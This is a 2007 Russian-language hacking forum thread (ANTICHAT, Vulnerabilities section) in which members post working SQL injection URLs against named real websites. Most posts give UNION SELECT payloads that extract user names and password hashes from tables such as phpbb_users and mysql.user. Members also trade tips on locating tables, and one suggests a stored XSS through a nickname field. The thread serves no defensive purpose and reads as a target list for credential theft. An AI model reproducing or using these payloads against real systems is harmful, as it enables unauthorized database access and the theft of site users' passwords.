HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.04.2007, 16:50
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами: 10686686

Репутация: 447
По умолчанию

Цитата:
Сообщение от Fr-Ron  
PS Пользователей не считал, но очень много =)
считать их не надо они вычисляются тем же самым limit'ом,юзеров 13549
 
Ответить с цитированием

  #2  
Старый 08.04.2007, 16:19
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
С нами: 10307906

Репутация: 1365


По умолчанию

www.generationsims2.com

фанатам Sims 2 посвящаеться:

Код:
http://www.generationsims2.com/news_com.php?idnews=-1+union+select+1,concat(user_id,0x3a,user_password),3,4,5+from+phpbb_users/*
 
Ответить с цитированием

  #3  
Старый 08.04.2007, 16:30
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
С нами: 10307906

Репутация: 1365


По умолчанию

Цитата:
http://gorodok.samaratoday.ru/showNews.php?idnews=-1385+union+select+1,2,USER(),4,5,6,7,8,9,10/*
самара =\
 
Ответить с цитированием

  #4  
Старый 08.04.2007, 16:32
_GaLs_
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
С нами: 10555586

Репутация: 726


По умолчанию

Код:
http://www.zhambyl.kz/main.php?action=news&full=2&lan=eng&text_type=-1+UNION+SELECT+1,database(),2,3,5,6,7,8,9/*
http://www.zhambyl.kz/main.php?action=news&full=2&lan=eng&text_type=-1+UNION+SELECT+1,version(),2,3,5,6,7,8,9/*
http://www.zhambyl.kz/main.php?action=news&full=2&lan=eng&text_type=-1+UNION+SELECT+1,user(),2,3,5,6,7,8,9/*
http://www.zhambyl.kz/main.php?action=news&full=2&lan=eng&text_type=-1+union+select+1,password,3,4,5,6,7,8,9+from+mysql.user/*
 
Ответить с цитированием

  #5  
Старый 08.04.2007, 16:36
random
Познающий
Регистрация: 05.09.2006
Сообщений: 50
С нами: 10357689

Репутация: 250
По умолчанию

Код:
http://www.elementemag.com/detail.php?page=news&id=14+union+select+1,2,3,4,5,concat(user,0x3a,password),7+from+mysql.user+limit+2/*
 
Ответить с цитированием

  #6  
Старый 08.04.2007, 17:21
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
С нами: 10282956

Репутация: 380
По умолчанию

Код:
http://z04.kazantipa.net/index.php?m1=1&m0=8&act=TopicLover&id=-430+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
мертвая скуля...
 
Ответить с цитированием

  #7  
Старый 08.04.2007, 17:37
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами: 10686686

Репутация: 447
По умолчанию

Цитата:
Сообщение от maxster  
Код:
http://z04.kazantipa.net/index.php?m1=1&m0=8&act=TopicLover&id=-430+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
мертвая скуля...
в каком плане мертвая? вроде выводит все
Код:
http://z04.kazantipa.net/index.php?m1=1&m0=8&act=TopicLover&id=-430+union+select+1,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13/*
 
Ответить с цитированием

  #8  
Старый 08.04.2007, 17:42
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
С нами: 10282956

Репутация: 380
По умолчанию

Цитата:
Сообщение от }{0TT@БЬ)Ч  
в каком плане мертвая? вроде выводит все
Код:
http://z04.kazantipa.net/index.php?m1=1&m0=8&act=TopicLover&id=-430+union+select+1,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13/*
я там ни одной таблицы не нашел...
 
Ответить с цитированием

  #9  
Старый 08.04.2007, 17:58
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами: 10243046

Репутация: 3033


По умолчанию

Вернусь к нашим "баранам"
Shados. Я сильно подозреваю что полезная инфа береться из таблицы users, она там есть
Цитата:
http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,3,4,5,TABLE_NAME,7,8,9,10,11,12 +from+INFORMATION_SCHEMA.TABLES+limit+28,28/*
Но вот при запросе к ней ругаеться что нет такой таблицы=\
Щас еще посмотрю
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #10  
Старый 08.04.2007, 18:00
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами: 10686686

Репутация: 447
По умолчанию

Цитата:
Сообщение от Constantine  
Вернусь к нашим "баранам"
Shados. Я сильно подозреваю что полезная инфа береться из таблицы users, она там есть
Но вот при запросе к ней ругаеться что нет такой таблицы=\
Щас еще посмотрю
просто база другая
Код:
http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,3,4,5,concat(username,char(58),password),7,8,9,10,11,12+from+shoutout_marycoughlan_db.users/*
2maxster
как вариант можно предложить активную xss в поле ника, создаешь фотку и в поле ника пишешь код.
пример:
Код:
http://z04.kazantipa.net/index.php?m0=8&m1=1

Последний раз редактировалось }{0TT@БЬ)Ч; 08.04.2007 в 18:22..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.